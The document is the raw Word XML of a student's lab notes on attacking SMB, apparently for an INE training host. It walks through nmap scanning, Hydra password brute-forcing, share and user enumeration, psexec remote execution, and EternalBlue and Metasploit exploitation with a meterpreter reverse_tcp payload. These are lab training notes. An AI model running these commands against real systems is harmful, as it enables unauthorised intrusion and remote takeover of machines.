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A50188" w14:textId="4F2AAD6B" w:rsidR="00853ABF" w:rsidRPr="00872BF1" w:rsidRDefault="007D28A8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00872BF1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Targeting SMB</w:t>
      </w:r>
      <w:r w:rsidRPr="00872BF1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0E5690" w14:textId="77777777" w:rsidR="007D28A8" w:rsidRDefault="007D28A8"/>
    <w:p w14:paraId="2DF1DD7E" w14:textId="1A09F18C" w:rsidR="007D28A8" w:rsidRPr="00872BF1" w:rsidRDefault="00872BF1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00872BF1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D300C11" w14:textId="77777777" w:rsidR="00872BF1" w:rsidRDefault="00872BF1"/>
    <w:p w14:paraId="7937D781" w14:textId="1E58CE05" w:rsidR="00872BF1" w:rsidRDefault="00872BF1">
      <w:r>
        <w:t>Nmap -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -Sc -p 445 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>demo.ine.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05386446" w14:textId="77777777" w:rsidR="00872BF1" w:rsidRDefault="00872BF1"/>
    <w:p w14:paraId="021B8EBD" w14:textId="66A93523" w:rsidR="00872BF1" w:rsidRDefault="00872BF1">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Firstly</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> get the username:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520EFB9C" w14:textId="04687D86" w:rsidR="00872BF1" w:rsidRDefault="00872BF1">
      <w:r>
        <w:t>#Then password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED985B3" w14:textId="77777777" w:rsidR="00872BF1" w:rsidRDefault="00872BF1"/>
    <w:p w14:paraId="3AC82A9A" w14:textId="4AF84CA8" w:rsidR="00872BF1" w:rsidRDefault="00872BF1">
      <w:r>
        <w:t>Hydra -l administrator -P /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/share/wordlists/Metasploit/unix_users.txt </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="171ABEEF" w14:textId="3875F63C" w:rsidR="00872BF1" w:rsidRDefault="00872BF1" w:rsidP="00872BF1">
      <w:r>
        <w:t xml:space="preserve">Hydra -l </w:t>
      </w:r>
      <w:r>
        <w:t>vagrant</w:t>
      </w:r>
      <w:r>
        <w:t>-P /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/share/wordlists/Metasploit/unix_users.txt </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7BF82D71" w14:textId="77777777" w:rsidR="00872BF1" w:rsidRDefault="00872BF1"/>
    <w:p w14:paraId="0510E372" w14:textId="00130784" w:rsidR="00872BF1" w:rsidRPr="00272058" w:rsidRDefault="00872BF1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00272058">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00272058">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>emumerate  the</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00272058">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> shares:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED1B18D" w14:textId="472047A9" w:rsidR="00872BF1" w:rsidRDefault="00872BF1">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -L </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -U vagrant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E119000" w14:textId="77777777" w:rsidR="00272058" w:rsidRDefault="00272058">
      <w:r>
        <w:t>/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C41641C" w14:textId="300A815D" w:rsidR="00872BF1" w:rsidRDefault="00872BF1">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Smbmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -u vagrant -p vagrant -H </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="09C5288E" w14:textId="77777777" w:rsidR="00872BF1" w:rsidRDefault="00872BF1"/>
    <w:p w14:paraId="6B9B8771" w14:textId="02939B02" w:rsidR="00872BF1" w:rsidRPr="00272058" w:rsidRDefault="00272058">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00272058">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00272058">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>enumerate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00272058">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> the other user account on the system:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03631593" w14:textId="77777777" w:rsidR="00272058" w:rsidRDefault="00272058"/>
    <w:p w14:paraId="18AED8AC" w14:textId="6926AB34" w:rsidR="00272058" w:rsidRDefault="00272058">
      <w:r>
        <w:t xml:space="preserve">Enum4linux -u vagrant -p vagrant -U </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="35676E67" w14:textId="7472CB27" w:rsidR="00272058" w:rsidRDefault="00272058">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>show</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> all the other user </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>account</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on the system </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6B9030" w14:textId="77777777" w:rsidR="00272058" w:rsidRDefault="00272058"/>
    <w:p w14:paraId="0F2BFD22" w14:textId="70AC365B" w:rsidR="00272058" w:rsidRPr="00272058" w:rsidRDefault="00272058" w:rsidP="00272058">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00272058">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00272058">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>enumerate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00272058">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> the other user account on the system</w:t>
      </w:r>
      <w:r w:rsidRPr="00272058">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00272058">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>metasplopit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00272058">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00272058">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B950FEC" w14:textId="77777777" w:rsidR="00272058" w:rsidRDefault="00272058"/>
    <w:p w14:paraId="1909A5E4" w14:textId="55FD543A" w:rsidR="00272058" w:rsidRDefault="00272058">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F18A7E5" w14:textId="51406C88" w:rsidR="00272058" w:rsidRDefault="00272058">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smb_enumusers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="54527C86" w14:textId="6ADEEDA3" w:rsidR="00272058" w:rsidRDefault="00272058">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Use (index no)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64066284" w14:textId="43DE02DD" w:rsidR="00272058" w:rsidRDefault="00272058">
      <w:r>
        <w:t>Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8ECE13" w14:textId="64D791F5" w:rsidR="00272058" w:rsidRDefault="00272058">
      <w:r>
        <w:t xml:space="preserve">Set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5B212A87" w14:textId="51F443F5" w:rsidR="00272058" w:rsidRDefault="00272058">
      <w:r>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SMBUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> vagrant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676610C8" w14:textId="241D38A8" w:rsidR="00272058" w:rsidRDefault="00272058">
      <w:r>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SMBPass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> vagrant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B5B37F" w14:textId="7F9FE519" w:rsidR="00272058" w:rsidRDefault="00272058">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16208C6A" w14:textId="0F6E4D45" w:rsidR="00272058" w:rsidRDefault="00272058"/>
    <w:p w14:paraId="033BF3C4" w14:textId="6CCC004B" w:rsidR="00272058" w:rsidRPr="00272058" w:rsidRDefault="00272058" w:rsidP="00272058">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00272058">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00272058">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>allow</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00272058">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> us to authenticate with system remotely via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00272058">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00272058">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> with legitimate crede</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00272058">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tials</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307B3F66" w14:textId="77777777" w:rsidR="00272058" w:rsidRDefault="00272058"/>
    <w:p w14:paraId="60CE165E" w14:textId="2389C31B" w:rsidR="00272058" w:rsidRDefault="00272058">
      <w:r>
        <w:t>Locate psexec.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B50B6A2" w14:textId="11EF8B6D" w:rsidR="00272058" w:rsidRDefault="00272058">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> +x psexec.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69657E66" w14:textId="29BCB16B" w:rsidR="00272058" w:rsidRDefault="00272058">
      <w:r>
        <w:t xml:space="preserve">Python3 psexec.py </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Administrator@target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5F0681CF" w14:textId="3C50AD3A" w:rsidR="00272058" w:rsidRDefault="00272058">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>provide</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the password for it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225915C7" w14:textId="7CC8C589" w:rsidR="00272058" w:rsidRDefault="00272058">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>provide</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D52E7A8" w14:textId="49898A38" w:rsidR="00272058" w:rsidRDefault="00272058">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6C3E921F" w14:textId="608A7C9E" w:rsidR="00272058" w:rsidRDefault="00272058"/>
    <w:p w14:paraId="73A64611" w14:textId="505BA6E7" w:rsidR="002D4C85" w:rsidRPr="00272058" w:rsidRDefault="002D4C85" w:rsidP="002D4C85">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00272058">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00272058">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>allow</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00272058">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> us to authenticate with system remotely via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00272058">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00272058">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> with legitimate crede</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00272058">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2597D27E" w14:textId="757F86B2" w:rsidR="002D4C85" w:rsidRDefault="002D4C85">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FA8D54" w14:textId="4CC828D0" w:rsidR="002D4C85" w:rsidRDefault="002D4C85">
      <w:r>
        <w:t>Use (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit_index</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> no)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3F71D0" w14:textId="411150F8" w:rsidR="002D4C85" w:rsidRDefault="002D4C85">
      <w:r>
        <w:t>Set payload windows/x64/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7DAD34F2" w14:textId="2F6B43B5" w:rsidR="002D4C85" w:rsidRDefault="002D4C85">
      <w:r>
        <w:t>Options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA33093" w14:textId="7699799F" w:rsidR="002D4C85" w:rsidRDefault="002D4C85">
      <w:r>
        <w:t xml:space="preserve">Set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="19158A85" w14:textId="5A230FE6" w:rsidR="002D4C85" w:rsidRDefault="002D4C85">
      <w:r>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SMBUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3CA4BE" w14:textId="0A572B94" w:rsidR="002D4C85" w:rsidRDefault="002D4C85">
      <w:r>
        <w:t xml:space="preserve">Set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SMBPass</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> vagrant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351ABC62" w14:textId="0DF18DB0" w:rsidR="002D4C85" w:rsidRDefault="002D4C85">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C767C68" w14:textId="3E547EB5" w:rsidR="00B26A37" w:rsidRDefault="00B26A37">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>give</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD0B252" w14:textId="77777777" w:rsidR="00B26A37" w:rsidRDefault="00B26A37"/>
    <w:p w14:paraId="73CA5A17" w14:textId="15ECBD93" w:rsidR="002D4C85" w:rsidRDefault="002D4C85">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="235AF7AD" w14:textId="7DD8FA8B" w:rsidR="002D4C85" w:rsidRDefault="002D4C85">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="779C8140" w14:textId="0612CF1C" w:rsidR="002D4C85" w:rsidRDefault="002D4C85">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getprivs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7F416E6A" w14:textId="77777777" w:rsidR="002D4C85" w:rsidRDefault="002D4C85"/>
    <w:p w14:paraId="03B6FEC7" w14:textId="3154B688" w:rsidR="00872BF1" w:rsidRPr="00BB0EF2" w:rsidRDefault="00BB0EF2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB0EF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">If </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB0EF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>donot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00BB0EF2">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> have any credential:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75587138" w14:textId="55D2F46C" w:rsidR="00BB0EF2" w:rsidRDefault="00BB0EF2">
      <w:r>
        <w:t xml:space="preserve"># we </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>check</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the version </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>is it</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BC9546" w14:textId="799B9DA2" w:rsidR="00BB0EF2" w:rsidRDefault="00BB0EF2"/>
    <w:p w14:paraId="00F33513" w14:textId="144790AA" w:rsidR="00BB0EF2" w:rsidRDefault="00DF542D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Msfconsoole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="22FC4250" w14:textId="7AC5D143" w:rsidR="00DF542D" w:rsidRDefault="00DF542D">
      <w:r>
        <w:t xml:space="preserve">Search </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eternalblue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3DA8C086" w14:textId="03C398B0" w:rsidR="00DF542D" w:rsidRDefault="00DF542D">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Use(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>index no)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064A5172" w14:textId="0B6BAB22" w:rsidR="00DF542D" w:rsidRDefault="00DF542D">
      <w:r>
        <w:t>Show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207C0272" w14:textId="3EDC37CD" w:rsidR="00DF542D" w:rsidRDefault="00DF542D">
      <w:r>
        <w:t xml:space="preserve">Set RHOSTS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="511A3A06" w14:textId="4C4BC097" w:rsidR="00DF542D" w:rsidRDefault="00DF542D">
      <w:r>
        <w:t>Run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5B279D" w14:textId="2D81D412" w:rsidR="00DF542D" w:rsidRDefault="00AA47E2">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>give</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> session on the target system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537CE01D" w14:textId="77777777" w:rsidR="00AA47E2" w:rsidRDefault="00AA47E2"/>
    <w:p w14:paraId="7ED18CD9" w14:textId="3CF55F6C" w:rsidR="0088197D" w:rsidRDefault="0088197D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Sysinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4BA8F56E" w14:textId="2EB8703E" w:rsidR="0088197D" w:rsidRDefault="0088197D">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Getuid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1D881318" w14:textId="77777777" w:rsidR="0088197D" w:rsidRDefault="0088197D"/>
    <w:p w14:paraId="76C86FAE" w14:textId="77777777" w:rsidR="00D11BFF" w:rsidRDefault="00D11BFF"/>
    <w:sectPr w:rsidR="00D11B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35C"/>
    <w:rsid w:val="00272058"/>
    <w:rsid w:val="002D4C85"/>
    <w:rsid w:val="0038435C"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="006B2E34"/>
    <w:rsid w:val="007D28A8"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="00872BF1"/>
    <w:rsid w:val="0088197D"/>
    <w:rsid w:val="00896227"/>
    <w:rsid w:val="00AA47E2"/>
    <w:rsid w:val="00B26A37"/>
    <w:rsid w:val="00BB0EF2"/>
    <w:rsid w:val="00D11BFF"/>
    <w:rsid w:val="00DE1282"/>
    <w:rsid w:val="00DF54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250481"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7F41BDEB-C1FA-4261-BB1D-D5045A328B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43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43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43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43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43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43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43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43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43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43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43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43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43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43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43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43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43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43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43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43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43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43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43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43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43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43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